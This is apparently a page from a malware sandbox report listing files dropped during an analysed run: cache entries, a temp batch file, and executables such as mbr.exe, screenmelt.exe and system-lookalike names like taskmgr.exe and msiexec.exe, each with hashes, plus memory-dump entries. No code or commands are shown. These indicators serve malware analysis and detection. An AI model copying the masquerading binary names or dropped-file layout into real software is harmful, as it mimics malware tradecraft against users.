C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9
Filesize
472B

MD5
1532f8bec1d945aefd54070b34d8e527

SHA1
37a614eb7824d404ed5e33f0a8d8228eedca6a4f

SHA256
28dc23c37335697644190de2ed80e7322cd872db5fb9bdf4bf140ba1580275cc

SHA512
7439ab5c76dcad67ff7b4f35b5a0dca3984a3be72f271afb98fd006f966039a76934979f45c2a0711220e40e11c97ccd44283c5f2fef307d05b1a6d4ed7a9e45

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize
170B

MD5
374f4e61769d65a25af1d47e4b20178b

SHA1
484e09dc5da8e57532b416fad77856798e8d980c

SHA256
d53a7a7b73a12836aa12c994fe0eb167c9a4aa3bd6000fb597475bc2f5560711

SHA512
38c855444b09b25a40cd7bb256f7212bb61f177f075dc5922d9f05de4f655f8d73cb569db6c3a21632cd9febc7a9a653812470a77b9dab50d0e48777130792c0

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
1f214836bda389e7204d7095544c3f10

SHA1
3e47047fddae0e26a61adf1b668f7ac51d72d822

SHA256
3361cf0b9f4339c121e40e1eb5701fa3bddc899b41adad6d16a9b35b01991e84

SHA512
b14ccdbf93026d5dd66132bc84a265720b73e4f46d988c4acf203f3c6ddabe2d554d5fbcfca03c560f3190d176a97237db12e793dd2901727e9a94f6d7632c4c

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_DDBD94486534E9D7296CF30055005EDC
Filesize
406B

MD5
e0e3e7a4327377751a892f71f460c0a5

SHA1
b7e96e91f3f388f0d7cc7c2c813c99154c8f49c8

SHA256
2de4711464687735c5ed8f12b87ab2e06586ebce1fda9268764a7a7f7599cf79

SHA512
fdcad28c374b07b07063992836665102f3ba85eb9de4b4c4be79ca2cfcdec0a0abff65af455edc22f7df46ad54aed66874ecb0d8e81a8ecb68d81dc0e52c10c7

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9
Filesize
402B

MD5
c2a864c6914a6482ed5faf688de34b59

SHA1
5d32d7a8fa3c785762e9820ad8a20d841c31a9b6

SHA256
343a3a1a6df2768d7eeac6598d9ad7a82ec4d83bc2f1b595a29eaa74c444b800

SHA512
503e8203ad92c9da87c50bc20b88fff8ffbbd89b9b5e539b64a094e3867fa592a99b8df771fbcc69277a545fd0be847fea969e26c84b1d1fc4ea1dbc8a23c9de

Download Submit
C:\Users\Admin\AppData\Local\Temp\594B.tmp\594C.tmp\594D.bat
Filesize
4KB

MD5
4a79415752ab6e7d4706620f91e372b0

SHA1
830c6d1a491031f57b7827dc23fdb3fb1b066dcb

SHA256
7f4a90cb061298868b15088311358326bbf9762d738b0238f61fe6372d80d4a0

SHA512
f0ea1c15e6f10e8ec012e9bd9ee4f2afc2b229ef508cd29ce498d44091ecdc14f13f34fe07ccae3f6e68c5a3da0b2202a94078d0b19cc159a82ef601a413c6b6

Download Submit
C:\Users\Admin\Downloads\user.bmp
Filesize
7KB

MD5
bce2c2fff9af8eb17db5fb8ec2f8468c

SHA1
b509ac36b55378e6cb985b5b6361bc7e6ff09c64

SHA256
63d356735b63778fdf39861fe03155e3766bcab0825074d72a540d1a309e12fe

SHA512
22baf89fc7b249e3fad8ffdeb6a67316e0a28b8e9a2e10cccca0ab99c31a40e8c2836b876ce3501706196d2303b88b52cc29e107b894eb9d3b1addbedfaf8d68

Download Submit
C:\Users\Admin\downloads\colorcmd.exe
Filesize
122KB

MD5
f07ad62ffe36c3350f14186618dffea4

SHA1
01372c5536edd2c0ad51df9d3cf51237f122384f

SHA256
31dee760b868645ad0f4e7270ec54942d01b1a7df769f04e52948b32e681a346

SHA512
3302acab75c14295ab9aadde5d25d8ffc7795e1e15357614692489a6e0edf86d2f5e464917251834d27b3ad95f262d3bc3088479a957fe2bf691b1066ced6406

Download Submit
C:\Users\Admin\downloads\mbr.exe
Filesize
47KB

MD5
8562ed46d745dceb3cc268693ca25c83

SHA1
309067f0c9703084654495a47e67f7a40824700d

SHA256
ea5d21e6598d52b30e9d055bc406c6227bbadb5c493addb27b32fb16a6dcae8c

SHA512
52f23e70f7ea6eab1a50a4008e563d787732f7361dfe10c48f39dae42bce023c90449c9a903733fab13c49b50f8c4fa7d4864ab26c69326aab0149c765fd677b

Download Submit
C:\Users\Admin\downloads\mmc.exe
Filesize
116KB

MD5
1568445f077482ac1d17a82403236a50

SHA1
ab42cb00af4f08629c30af053325e0bc3332659b

SHA256
584c00a54afbf23413fd3d39a06d07c0ae811965e5670ebc5d8abad70a594ce5

SHA512
83941d9ec3e89d4301405800afc3140e3406cbf2d405e1fe886136ecb669375fcd9e2adfdfeb897c4603d8220db374e63444608accd8ba4ba3a7dbd7aac0d6ca

Download Submit
C:\Users\Admin\downloads\msiexec.exe
Filesize
210KB

MD5
a968951f4f6aeec3eb1aa67b82fdcee9

SHA1
52d40548aaed7604709f78da62f7c22810e05cf3

SHA256
79b1ba6b9959dfe0289ff1182cf2ecb130f8568dd67a4fec6b6b8464dbfb4446

SHA512
bba1caf8e2173a082e220eec1f1b5da880d39afca353cfafe8a7850d4a7d85e1ec0ff771bffb440afdc475eef50f9b720b5a3e9aea6c6cd2b3a8486a1681df3a

Download Submit
C:\Users\Admin\downloads\screenmelt.exe
Filesize
116KB

MD5
906a6d30ea07a63b252c21ff4e8cf785

SHA1
cceae82b6a75838a038096cf8dd721369764e113

SHA256
0850c8ca4e063475b6d83171b28eaaf1aec4452814a6c2e07acfc6f9df1d0359

SHA512
dafb680429cfe5db8dc9528a3f515e1e9e18289c97bb6cbcf612934ba441d97a60392878ee3554bfa3f0ecc40b49f4db4fef6bc3895681d4fa8c563a1a43c334

Download Submit
C:\Users\Admin\downloads\taskmgr.exe
Filesize
139KB

MD5
12c0b030ad5d135dce89d85becfdb76f

SHA1
f8afc5bb441b54a0b4dcb66e158abd44187a43fe

SHA256
8436fcc98e61ea958dd6adf346a81c5d08cb91e9d9a6cc67cacf4f1b14db13b9

SHA512
710f39020f9e06d087d7ff55fe887203716a24080e368dbaa837421f8874fc35f0d39ac1634bfaa60d4fee4c93f4699872c725e63d759dfd81dc751a56ead61a

Download Submit
C:\Users\Admin\downloads\winnt64.exe
Filesize
188KB

MD5
aa992d93467882ff211f211495e6c545

SHA1
75a1a182af719168b9ca7b9c42282b997f82d443

SHA256
dadd54e1c3b0496d3a49e112da7c3d71255037df9ba27b890131330b42eabf88

SHA512
54d07b5f123b20128459de04694ed295275498c646fef596830c2c98ff1a8fa4741c95ce72be6d59a713fc6d7d7365c4f13eace2ed6bf357ebef44885b882d5d

Download Submit
C:\Users\Admin\downloads\winntcus64.png
Filesize
135KB

MD5
6630a0fb912cd00e64f2014401094beb

SHA1
e869c10b7f664332a1274e6de8812d4dc21d1bdc

SHA256
2b8c4658c0f5b47bab5f6ba1135d7d5a8d31414cf788b8fa7c4c520d1db92ba2

SHA512
6c7b97f677d43d22b1a2d7a12421f7fbcf4bb0017647dab846052560c0b1792ee1cdc8220a29eec9f5ab6f23be51b2c375101353e2c2112c492f59c7a701af87

Download Submit
C:\Users\Public\Desktop\ISEEYOU5.prsnlz
Filesize
73B

MD5
f2c62761eaf03a1477f392a23a2b951d

SHA1
243ae1c1ec3377cf835efb728180dfd19567d2f2

SHA256
f033d117272cafc4072c2a9e6986381939f19eebe57d08be26834f752a9c4a18

SHA512
d7eaf3915aadaf5b0d2cb7ca740b8bbd8ce93f809ebf39e92e4934c96d44020a631787aeec3e28c290a51c01c91a5044f3d4b679d8451fd8a1cdc871a5e47c27

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1620-104-0x000001F6964B0000-0x000001F6964B2000-memory.dmp

Filesize
8KB

Download
memory/1620-167-0x000001F69FD60000-0x000001F69FD61000-memory.dmp

Filesize
4KB

Download
memory/1620-168-0x000001F69FD80000-0x000001F69FD81000-memory.dmp

Filesize
4KB

Download
memory/1620-85-0x000001F698F20000-0x000001F698F30000-memory.dmp

Filesize
64KB

Download
memory/1620-69-0x000001F698E20000-0x000001F698E30000-memory.dmp

Filesize
64KB

Download
memory/2292-144-0x000001CBFFAF0000-0x000001CBFFAF2000-memory.dmp

Filesize
8KB

Download
memory/2292-137-0x000001CBFDB10000-0x000001CBFDB12000-memory.dmp

Filesize
8KB

Download
memory/2292-139-0x000001CBFDB30000-0x000001CBFDB32000-memory.dmp

Filesize
8KB

Download
memory/2292-134-0x000001CBFD9E0000-0x000001CBFD9E2000-memory.dmp

Filesize
8KB

Download
memory/2292-146-0x000001CBFFEF0000-0x000001CBFFEF2000-memory.dmp

Filesize
8KB

Download
memory/2292-148-0x000001CBFFF10000-0x000001CBFFF12000-memory.dmp

Filesize
8KB

Download
memory/2776-281-0x000001C0604D0000-0x000001C0604D2000-memory.dmp

Filesize
8KB

Download
memory/2776-283-0x000001C060500000-0x000001C060502000-memory.dmp

Filesize
8KB

Download
memory/3840-669-0x000001FB04B00000-0x000001FB04C00000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads